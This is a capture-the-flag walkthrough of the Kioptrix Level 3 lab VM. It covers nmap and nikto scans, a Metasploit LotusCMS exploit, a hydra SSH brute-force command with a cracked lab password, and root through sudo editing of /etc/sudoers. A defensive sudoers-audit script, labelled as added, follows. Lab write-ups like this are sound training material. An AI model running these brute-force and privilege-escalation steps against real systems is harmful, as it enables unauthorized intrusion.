So, going back to popping these vulnerable VMs: on to Kioptrix Level 3.
Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/?p=358
Vulnhub: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
🔥HOST DISCOVERY🔥
ARP
arp-scan -l
ping
ping 192.168.0.20
The box is up and responding
🔥PORT SCANNING🔥
TCP
nmap -sS -A -sC -sV -O -p0- 192.168.0.20 -oA nmap_tcp_full_ver_sV
UDP
nmap -sU -n 192.168.0.20 -oA nmap_udp_def
Hmmm, nothing for UDP then.
🔥SERVICE ENUMERATION🔥
22 - ssh
ssh 192.168.0.20
80 - http
Has a login page
http://192.168.0.20/index.php?system=Admin
We identify the platform as LotusCMS.
nikto -h 192.168.0.20
A few more bits are found with nikto:
http://192.168.0.20/phpmyadmin/
phpMyAdmin 2.11.3.0
🔥EXPLOITATION🔥
Looking through metasploit we find a likely exploit
exploit/multi/http/lcms_php_exec
Execution of the exploit gives us a shell with www-data permissions
🔥PRIV ESCALATION🔥
Looking around the file system
I found the user loneferret, so I decided to try brute-forcing SSH using hydra. More on this later.
Gconfig.php has MySQL creds stored in clear text, which will be useful.
Checking back on my brute-forcing a little later, we have a hit:
hydra -e nsr -l loneferret -P /usr/share/wordlists/rockyou.txt -t 4 ssh://192.168.0.20
Now SSH'd in as loneferret:starwars
sudo ht
gives us an error, but a bit of google-fu turns up a quick fix:
https://stackoverflow.com/questions/6804208/nano-error-error-opening-terminal-xterm-256color
Once we get it working, we are faced with the ht editor screen.
After fighting with the GUI and figuring out how to use it, I open /etc/sudoers with Alt+F and append , /bin/sh
to the end of the line so we can bump to root.
Try again
got root 😎😎😎
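The escalation above works because sudo hands loneferret an editor, and an editor can rewrite /etc/sudoers; the same holds for any pager, shell or interpreter on a sudo line. As an added example (not from the post), this POSIX shell function audits sudoers-format rules for that class of grant; the sample rules it runs on are constructed and the list of risky binaries is my own choice.

```shell
#!/bin/sh
# Added example, not from the original write-up. Audits sudoers-style rules for
# commands that give a root shell or root file write when run via sudo (ht did
# here). Usage: audit_sudoers /etc/sudoers   (or pipe rule lines on stdin).

# Binaries that are trivially abusable via sudo (my own, non-exhaustive choice).
RISKY_BINS='ht vi vim nano ed emacs less more sh bash dash zsh python perl awk find'

# Reads sudoers-format lines from the given file (or stdin) and prints one
# "user:binary" line for every granted command whose basename is risky.
audit_sudoers() {
    cat -- "$@" | grep -Ev '^[[:space:]]*(#|$)' | while IFS= read -r line; do
        # Skip Defaults/alias lines; keep only "user host=(runas) [TAG:] cmds".
        case "$line" in Defaults*|*_Alias*) continue ;; *=*) ;; *) continue ;; esac
        user=${line%%[[:space:]]*}
        cmds=${line#*=}
        cmds=${cmds#*)}                 # drop the (runas) spec if present
        echo "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            cmd=${cmd#*:}               # drop NOPASSWD:/SETENV: style tags
            cmd=$(echo "$cmd" | sed 's/^[[:space:]]*//; s/[[:space:]].*$//')
            case "$cmd" in '!'*|'') continue ;; esac   # negated entries grant nothing
            base=${cmd##*/}
            for r in $RISKY_BINS; do
                if [ "$base" = "$r" ]; then echo "$user:$base"; fi
            done
        done
    done
}

# Constructed sample rules; the loneferret line models the kind of grant the
# walkthrough exploited (the box's real sudoers file is not reproduced here).
SAMPLE='Defaults env_reset
root ALL=(ALL) ALL
%admin ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
backup ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/bash
www-data ALL=(ALL) NOPASSWD: /usr/sbin/service apache2 restart'

# Runs the audit over the sample: flags loneferret:ht and backup:bash only,
# since the negated su entry grants nothing and service/rsync are not listed.
audit_sample() { printf '%s\n' "$SAMPLE" | audit_sudoers; }
audit_sample
```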
Please follow me @shifty0g
Great write up! Voted and followed!
If you have not seen it yet, check out vulnhub.com for more vulnerable-by-design challenges.
Thank you for the upvote :)